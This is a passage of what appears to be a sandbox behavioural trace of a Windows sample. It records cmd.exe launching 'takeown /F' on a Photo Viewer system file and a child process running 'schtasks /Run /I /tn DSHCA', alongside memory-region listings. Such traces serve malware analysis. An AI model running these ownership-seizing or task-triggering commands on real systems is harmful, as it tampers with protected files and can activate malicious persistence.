_ArgList=0x47f1dc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0301.125] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x47f1dc | out: _Buffer=">") returned 1 [0301.125] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.125] GetFileType (hFile=0x3c) returned 0x2 [0301.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.125] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f1bc | out: lpMode=0x47f1bc) returned 1 [0301.126] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.126] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x47f1d4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x47f1d4*=0x1e) returned 1 [0301.126] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.126] GetFileType (hFile=0x3c) returned 0x2 [0301.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.126] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f45c | out: lpMode=0x47f45c) returned 1 [0301.126] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.126] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7b7780*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x47f474, lpReserved=0x0 | out: lpBuffer=0x7b7780*, lpNumberOfCharsWritten=0x47f474*=0x7) returned 1 [0301.126] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x47f47c | out: _Buffer=" /F \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\" ") returned 73 [0301.126] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.126] GetFileType (hFile=0x3c) returned 0x2 [0301.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.127] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f454 | out: lpMode=0x47f454) returned 1 [0301.127] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.127] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x47f46c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x47f46c*=0x49) returned 1 [0301.127] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x47f490 | out: _Buffer="\r\n") returned 2 [0301.127] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.127] GetFileType (hFile=0x3c) returned 0x2 [0301.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.127] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f468 | out: lpMode=0x47f468) returned 1 [0301.127] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.127] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x47f480, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x47f480*=0x2) returned 1 [0301.128] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0301.128] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0301.128] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0301.128] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0301.128] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0301.128] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0301.128] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0301.128] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0301.128] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0301.128] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0301.128] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0301.128] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0301.128] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0301.128] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0301.128] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0301.128] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0301.128] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0301.128] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0301.128] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0301.128] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0301.128] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0301.128] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0301.128] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0301.128] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0301.128] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0301.128] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0301.128] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0301.128] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0301.128] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0301.128] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0301.128] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0301.128] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0301.128] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0301.128] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0301.128] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0301.128] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0301.128] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0301.128] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0301.128] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0301.128] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0301.128] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0301.128] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0301.128] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0301.128] SetErrorMode (uMode=0x0) returned 0x0 [0301.128] SetErrorMode (uMode=0x1) returned 0x0 [0301.129] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7bf9f8, lpFilePart=0x47f22c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47f22c*="Desktop") returned 0x1d [0301.129] SetErrorMode (uMode=0x0) returned 0x1 [0301.129] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0301.129] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0301.129] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.129] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0xffffffff [0301.129] GetLastError () returned 0x2 [0301.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.129] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0xffffffff [0301.129] GetLastError () returned 0x2 [0301.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.129] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0x7bcc18 [0301.130] FindClose (in: hFindFile=0x7bcc18 | out: hFindFile=0x7bcc18) returned 1 [0301.130] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0xffffffff [0301.130] GetLastError () returned 0x2 [0301.130] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0x7bcc18 [0301.130] FindClose (in: hFindFile=0x7bcc18 | out: hFindFile=0x7bcc18) returned 1 [0301.130] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0301.130] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0301.130] GetConsoleTitleW (in: lpConsoleTitle=0x47f000, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.130] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0301.130] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0301.130] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0301.130] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0301.130] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0301.130] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0301.130] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0301.130] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0301.130] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0301.130] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0301.130] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0301.130] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0301.130] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0301.130] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0301.130] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0301.130] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0301.130] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0301.130] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0301.131] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0301.131] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0301.131] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0301.131] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0301.131] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0301.131] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0301.131] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0301.131] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0301.131] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0301.131] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0301.131] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0301.131] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0301.131] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0301.131] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0301.131] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0301.131] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0301.131] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0301.131] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0301.131] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0301.131] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0301.131] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0301.131] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0301.131] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0301.131] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0301.131] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0301.131] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0301.131] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0301.131] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0301.131] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0301.131] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0301.131] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0301.131] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0301.131] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0301.131] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0301.131] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0301.131] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0301.131] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0301.131] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0301.131] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0301.131] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0301.131] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0301.131] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0301.131] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0301.131] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0301.132] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0301.132] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0301.132] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0301.132] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0301.132] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0301.132] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0301.132] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0301.132] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0301.132] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0301.132] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0301.132] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0301.132] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0301.132] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0301.132] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0301.132] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0301.132] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0301.132] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0301.132] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0301.132] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0301.132] SetErrorMode (uMode=0x0) returned 0x0 [0301.132] SetErrorMode (uMode=0x1) returned 0x0 [0301.132] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7bcfc0, lpFilePart=0x47eb0c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47eb0c*="Desktop") returned 0x1d [0301.132] SetErrorMode (uMode=0x0) returned 0x1 [0301.132] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0301.132] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0301.132] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.132] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.133] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0xffffffff [0301.133] GetLastError () returned 0x2 [0301.133] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.133] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0xffffffff [0301.133] GetLastError () returned 0x2 [0301.133] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0x7bfdc8 [0301.133] FindClose (in: hFindFile=0x7bfdc8 | out: hFindFile=0x7bfdc8) returned 1 [0301.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0xffffffff [0301.133] GetLastError () returned 0x2 [0301.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0x7bfdc8 [0301.133] FindClose (in: hFindFile=0x7bfdc8 | out: hFindFile=0x7bfdc8) returned 1 [0301.133] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0301.133] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0301.133] GetConsoleTitleW (in: lpConsoleTitle=0x47ed8c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.134] InitializeProcThreadAttributeList (in: lpAttributeList=0x47ecb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x47ec9c | out: lpAttributeList=0x47ecb8, lpSize=0x47ec9c) returned 1 [0301.134] UpdateProcThreadAttribute (in: lpAttributeList=0x47ecb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x47eca4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x47ecb8, lpPreviousValue=0x0) returned 1 [0301.134] GetStartupInfoW (in: lpStartupInfo=0x47ecf0 | out: lpStartupInfo=0x47ecf0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.134] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.135] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0301.135] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0301.135] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0301.135] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0301.135] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x47ec40*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x47ec8c | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"", lpProcessInformation=0x47ec8c*(hProcess=0xb0, hThread=0xb8, dwProcessId=0xeec, dwThreadId=0x3ac)) returned 1 [0301.142] CloseHandle (hObject=0xb8) returned 1 [0301.142] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0301.142] GetEnvironmentStringsW () returned 0x7be410* [0301.142] FreeEnvironmentStringsA (penv="=") returned 1 [0301.142] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) Thread: id = 993 os_tid = 0xc4c Process: id = "138" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x74e1c000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xe2c" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Run /I /tn DSHCA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9543 start_va = 0xd40000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 9544 start_va = 0xd60000 end_va = 0xd61fff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 9545 start_va = 0xd70000 end_va = 0xd83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 9546 start_va = 0xd90000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 9547 start_va = 0xdd0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 9548 start_va = 0xed0000 end_va = 0xed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 9549 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9550 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 9551 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9552 start_va = 0x7f160000 end_va = 0x7f182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f160000" filename = "" Region: id = 9553 start_va = 0x7f18b000 end_va = 0x7f18dfff entry_point = 0x0 region_type = private name = "private_0x000000007f18b000" filename = "" Region: id = 9554 start_va = 0x7f18e000 end_va = 0x7f18efff entry_point = 0x0 region_type = private name = "private_0x000000007f18e000" filename = "" Region: id = 9555 start_va = 0x7f18f000 end_va = 0x7f18ffff entry_point = 0x0 region_type = private name = "private_0x000000007f18f000" filename = "" Region: id = 9556 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9557 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9558 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9559 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = 